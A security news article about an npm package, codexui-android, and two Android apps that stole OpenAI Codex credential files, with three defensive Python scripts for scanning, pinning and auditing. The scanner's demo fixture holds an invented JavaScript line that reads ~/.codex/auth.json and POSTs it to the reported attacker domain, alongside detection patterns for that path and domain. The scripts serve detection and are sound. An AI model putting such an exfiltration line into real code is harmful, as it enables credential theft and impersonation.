The widely used Codex npm package misappropriated developer tokens for a duration of one month.
TL;DR: A popular npm package for OpenAI Codex, which has 29,000 weekly downloads, has been stealing developer authentication tokens for a month. The same credential-theft scheme was found to operate through two Android apps with over 60,000 combined downloads.
The npm package appeared legitimate, featuring an active GitHub repository, a consistent development history, and approximately 29,000 weekly downloads. It delivered what it promised to developers using OpenAI Codex: a remote web UI for the AI coding tool. However, for the past month, every use of codexui-android has been silently accessing the user's Codex authentication file and sending it to a server controlled by an attacker. The compromised data includes access tokens, refresh tokens, ID tokens, and account IDs, allowing an attacker to impersonate the developer indefinitely. “The refresh_token doesn’t expire,” noted Aikido Security researcher Charlie Eriksen, adding, “An attacker holding it can silently impersonate you indefinitely.”
How it functioned
The attack was notably sophisticated for a compromise of the npm supply chain. Unlike typical supply chain attacks that depend on typosquatting or temporary packages, codexui-android was a functioning tool under active development. Its GitHub repository appeared clean, with malicious code solely present in the npm build.
The package extracts the contents of Codex’s ~/.codex/auth.json file, a plaintext credential cache created when a user logs in through the Codex app, CLI, or IDE extension. It then transmits those credentials to sentry.anyclaw[.]store, a server name designed to mimic Sentry, a legitimate error-tracking platform. The harmful functionality was introduced roughly a month after the package's initial publication, which is a common tactic for establishing user trust prior to deploying a harmful payload. WHOIS records reveal that the exfiltration domain was registered on April 12, 2026, just two days after the first package version (0.1.72) was uploaded to npm. The malicious code emerged from version 0.1.82 onward.
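As an added illustration of how a defender can look for the behaviour described above in an installed dependency tree (this is example code written for this article, not code from Aikido, from the package, or from its author): the script walks a node_modules directory and flags any file that references the ~/.codex/auth.json path or the reported exfiltration domain. The tree it scans is constructed in a temporary directory for the demo; the JavaScript it contains, the package layout and the fetch call are invented stand-ins, not the real package's code. A hit is a reason to read the file, not proof of malice on its own.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Indicators taken from the report: the credential file that was read and the
# domain it was sent to. Anything matching deserves a manual look, not an automatic verdict.
INDICATORS = {
    "codex_dir": re.compile(r"\.codex\b"),
    "auth_json": re.compile(r"\bauth\.json\b"),
    "exfil_domain": re.compile(r"anyclaw\.store", re.IGNORECASE),
}
SCAN_SUFFIXES = {".js", ".cjs", ".mjs", ".ts", ".json"}


def package_name(node_modules: Path, file: Path) -> str:
    """Map a file to the npm package that ships it (handles nested node_modules and @scopes)."""
    parts = file.relative_to(node_modules).parts
    if "node_modules" in parts:                       # nested dependency tree
        last = len(parts) - 1 - parts[::-1].index("node_modules")
        parts = parts[last + 1:]
    return "/".join(parts[:2]) if parts[0].startswith("@") else parts[0]


def scan_node_modules(node_modules: Path) -> list[dict]:
    """Return one finding per file that matches at least one indicator."""
    findings = []
    for file in sorted(node_modules.rglob("*")):
        if not file.is_file() or file.suffix not in SCAN_SUFFIXES:
            continue
        text = file.read_text(encoding="utf-8", errors="ignore")
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if hits:
            findings.append({
                "package": package_name(node_modules, file),
                "file": file.relative_to(node_modules).as_posix(),
                "indicators": hits,
            })
    return findings


def build_sample_tree() -> Path:
    """Constructed node_modules for the demo: one benign package and one that carries the
    reported indicators. The JavaScript below is invented, not the real package's code."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    benign = root / "left-pad"
    benign.mkdir(parents=True)
    (benign / "index.js").write_text("module.exports = (s, n) => s.padStart(n);\n")

    suspicious = root / "codexui-android" / "dist"
    suspicious.mkdir(parents=True)
    (suspicious / "server.js").write_text(
        "const authPath = path.join(os.homedir(), '.codex', 'auth.json');\n"
        "fetch('https://sentry.anyclaw.store/ingest', { method: 'POST',"
        " body: fs.readFileSync(authPath) });\n"
    )
    return root


if __name__ == "__main__":
    for finding in scan_node_modules(build_sample_tree()):
        print(f"{finding['package']}: {finding['file']} -> {', '.join(finding['indicators'])}")
```

Point it at a real project with `scan_node_modules(Path("node_modules"))`. The scan is deliberately string-based, so it catches the plain-text form reported here; packed or obfuscated payloads need a review of the published tarball against the repository, which is exactly the gap this package exploited.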
The same attack in the Play Store
The npm package was not the only method of distribution. Aikido discovered that an Android app called OpenClaw Codex Claude AI Agent, created by a developer named BrutalStrike, was using the same npm package within a PRoot sandbox on users’ devices. This app had gained over 50,000 downloads on Google Play.
Another app by BrutalStrike, named Codex, had more than 10,000 downloads and included the same exfiltration mechanism. Neither app pinned a specific npm package version, so each automatically pulled whatever version was currently published, which let the malicious code reach mobile users as soon as it went live.
With approximately 29,000 weekly npm downloads plus over 60,000 mobile installations, this incident represents one of the more significant credential-theft operations targeting the AI developer tool ecosystem.
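The unpinned-dependency problem described above is easy to check for mechanically. The following is an added example, not code from the article or from either app: it reads a package.json, reports every dependency whose spec is not an exact version, and rewrites those specs to the versions actually installed (as a lockfile or `npm ls --json` would report them). The manifest and the resolved-version map are constructed for the demo; the wrapper project and its version numbers are invented.

```python
from __future__ import annotations

import json
import re

# An exact version: three numeric components, optionally with a prerelease or build tag.
# Everything else (^, ~, >=, *, x, "latest", dist-tags, git/http URLs) can resolve to a
# newer release at install time and is flagged.
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")
SECTIONS = ("dependencies", "devDependencies", "optionalDependencies")


def unpinned_dependencies(package_json: str) -> dict[str, str]:
    """Return {name: spec} for every dependency whose spec is not an exact version."""
    manifest = json.loads(package_json)
    return {
        name: spec
        for section in SECTIONS
        for name, spec in manifest.get(section, {}).items()
        if not EXACT_VERSION.match(spec.strip())
    }


def pin_manifest(package_json: str, resolved: dict[str, str]) -> str:
    """Rewrite every unpinned spec to the version currently installed. Names missing from
    `resolved` are left as they are, so a second unpinned_dependencies() pass shows them.
    Pinning freezes a version; it does not vouch for it, so review what you pin."""
    manifest = json.loads(package_json)
    for section in SECTIONS:
        for name, spec in manifest.get(section, {}).items():
            if not EXACT_VERSION.match(spec.strip()) and name in resolved:
                manifest[section][name] = resolved[name]
    return json.dumps(manifest, indent=2)


# Constructed manifest for the demo; the wrapper project and its versions are invented.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-codex-wrapper",
    "dependencies": {
        "codexui-android": "latest",
        "express": "^4.19.2",
        "ws": "8.17.1",
    },
    "devDependencies": {"typescript": "~5.4.0"},
})

# Constructed "what is installed right now" map, as a lockfile would record it.
SAMPLE_RESOLVED = {"codexui-android": "0.1.81", "express": "4.19.2", "typescript": "5.4.5"}


if __name__ == "__main__":
    print("unpinned:", unpinned_dependencies(SAMPLE_MANIFEST))
    print(pin_manifest(SAMPLE_MANIFEST, SAMPLE_RESOLVED))
```

Run it in CI against the manifest that an app bundles, and fail the build when the dictionary is non-empty; combined with a committed lockfile and `npm ci`, a new upstream release then cannot change what ships without a reviewed change to the repository.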
The author’s changing narrative
The npm account associated with the package is owned by “friuns,” identified by Aikido as Igor Levochkin. When approached on GitHub, the author first claimed to have lost access to the npm account, later amending this to say they were “currently investigating this issue internally.”
Levochkin asserted that no credential data was shared with third parties but did not clarify why the exfiltration code was embedded only in the npm build or the reason for accessing users’ Codex tokens. The X profile linked to the account includes the domain anyclaw[.]store, the same domain to which the stolen tokens were sent.
A growing trend
This attack occurs during a rise in threats against AI developer tools. Recently, a compromised VS Code extension breached GitHub’s internal repositories, exfiltrating 3,800 repositories after an employee installed the malicious package. This attack, linked to the group TeamPCP, extracted credentials from 1Password vaults, Claude Code configurations, and AWS.
The takeaway from both incidents is consistent: as AI coding tools become essential infrastructure, the authentication tokens they generate—and often store in plaintext—become prime targets. OpenAI’s documentation warns developers to treat ~/.codex/auth.json like a password. The codexui-android campaign exemplifies the consequences of ignoring this advice and how tools that developers trust can be designed to exploit that trust.
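To make "treat ~/.codex/auth.json like a password" concrete, here is an added audit script (example code for this article, not from OpenAI, Aikido or the package): it checks the file's permissions, lists which of the four credential kinds named above are cached, reads the access token's expiry from its JWT payload without verifying it, and flags the refresh token because the report says it does not expire. The layout it assumes (a top-level `tokens` object holding `access_token`, `refresh_token`, `id_token` and `account_id`) is an assumption; adjust the key names if your file differs. The sample files it audits are written to a temporary directory with invented, unsigned tokens.

```python
from __future__ import annotations

import base64
import json
import os
import stat
import tempfile
import time
from pathlib import Path
from typing import Optional

# Assumed layout of ~/.codex/auth.json: a "tokens" object holding the four values
# the article lists. Adjust the key names if your file differs.
TOKEN_KEYS = ("access_token", "refresh_token", "id_token", "account_id")


def jwt_claims(token: str) -> dict:
    """Decode a JWT payload for inspection only; the signature is not checked."""
    try:
        payload = token.split(".")[1]
        payload += "=" * (-len(payload) % 4)          # restore base64url padding
        return json.loads(base64.urlsafe_b64decode(payload))
    except (IndexError, ValueError):
        return {}


def audit_auth_file(path: Path, now: Optional[float] = None) -> dict:
    """Report what the credential cache exposes and whether its permissions are tight."""
    now = time.time() if now is None else now
    report: dict = {"path": str(path), "issues": []}
    if not path.is_file():
        report["issues"].append("file not found (no cached login)")
        return report

    mode = stat.S_IMODE(path.stat().st_mode)
    report["mode"] = oct(mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        report["issues"].append("readable by group/others; expected 0600")

    tokens = json.loads(path.read_text()).get("tokens", {})
    report["credentials_present"] = sorted(k for k in TOKEN_KEYS if tokens.get(k))

    exp = jwt_claims(tokens.get("access_token", "")).get("exp")
    if exp is not None:
        report["access_token_expires_in_s"] = int(exp - now)
    if tokens.get("refresh_token"):
        report["issues"].append(
            "refresh_token present: long-lived; re-authenticate to rotate it "
            "if the host or any dependency that ran on it is suspect")
    return report


def _fake_jwt(claims: dict) -> str:
    """Unsigned JWT with an invented payload, for the demo only."""
    enc = lambda obj: base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}."


def write_sample_auth(directory: Path, mode: int, now: float) -> Path:
    """Write a constructed auth.json (fake tokens, fake account id) with the given file mode."""
    directory.mkdir(parents=True, exist_ok=True)
    path = directory / "auth.json"
    path.write_text(json.dumps({"tokens": {
        "access_token": _fake_jwt({"sub": "user_constructed", "exp": int(now) + 3600}),
        "refresh_token": "rt_constructed_placeholder",
        "id_token": _fake_jwt({"sub": "user_constructed", "email": "dev@example.invalid"}),
        "account_id": "acct_constructed_placeholder",
    }}))
    os.chmod(path, mode)
    return path


def run_demo(now: Optional[float] = None) -> tuple[dict, dict]:
    """Audit one loosely permissioned and one correctly permissioned sample file."""
    now = time.time() if now is None else now
    base = Path(tempfile.mkdtemp())
    loose = audit_auth_file(write_sample_auth(base / "loose", 0o644, now), now)
    strict = audit_auth_file(write_sample_auth(base / "strict", 0o600, now), now)
    return loose, strict


if __name__ == "__main__":
    for report in run_demo():
        print(json.dumps(report, indent=2))
```

On a real machine call `audit_auth_file(Path.home() / ".codex" / "auth.json")`. The permission check is only the first line of defence: a dependency running as the same user reads a 0600 file just as easily, which is why the script also reports the refresh token, the credential that keeps working after the short-lived access token has expired.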
Aikido has also reported that deleted Google API keys can remain active for up to 23 minutes post-revocation, a timeframe that attackers could exploit to access user data and Gemini conversations. Google has subsequently categorized the issue as a P0 bug. This finding highlights a broader concern: credential revocation in cloud environments often lacks the immediacy that defenders assume.